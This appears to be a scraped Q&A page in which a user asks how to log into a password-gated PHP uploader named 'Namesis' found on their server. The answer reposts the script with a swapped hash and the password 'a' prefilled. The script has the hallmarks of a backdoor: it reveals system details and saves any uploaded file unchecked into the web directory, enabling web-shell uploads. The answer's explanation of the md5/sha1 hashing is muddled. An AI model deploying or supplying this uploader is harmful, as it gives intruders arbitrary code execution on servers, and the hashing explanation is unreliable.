I have a PHP script on Linux server and I can just display it on the browser and this script tell me that I must enter the password to logon (upload script). This is the PHP code:
<?php
session_start();
if($_SESSION["adm"]){
echo '<b>Namesis<br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
echo '<b>Upload Success !!!</b><br><br>';
} else {
echo '<b>Upload Fail !!!</b><br><br>';
}
}
}
if($_POST["p"]) {
$p = $_POST["p"];
$pa = md5(sha1($p));
if($pa=="0cc175b9c0f1b6a831c399e269772661") {
$_SESSION["adm"] = 1;
}
}
?>
<form action="" method="post">
<input type="text" name="p">
</form>
I see that the password is md5; when I decrypt this 0cc175b9c0f1b6a831c399e269772661
I find the result is "`a`" but when I enter the "`a`" password the script doesn't login successfully. I have tried to upload.php?p=a
and upload.pph?p=0cc175b9c0f1b6a831c399e269772661
and nothing changed.
Please how can I login in this script. I'm worried.
Try this: Here you have use not only md5() but also sha1() so decrypted 'a' will be 77de54ccf56eb6f7dbf99e4d3be949ab
.Thanks
<?php
session_start();
if(isset($_SESSION["adm"]) && $_SESSION["adm"]==1){
echo '<b>Namesis :'.php_uname().'<br></b><br>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if(isset($_POST['_upl']) && $_POST['_upl']== "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
echo '<b>Upload Success !!!</b><br><br>';
}else {
echo '<b>Upload Fail !!!</b><br><br>';
}
}
}
if(isset($_POST["p"])){
$p = $_POST["p"];
$pa = md5(sha1($p));
if($pa=="77de54ccf56eb6f7dbf99e4d3be949ab"){
$_SESSION["adm"] = 1;
}
}
?>
<form action="<?php echo htmlspecialchars($_SERVER["PHP_SELF"]);?>" method="post">
<input type="text" name="p" value="a">
<input type="submit" value="submit">
</form>
The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.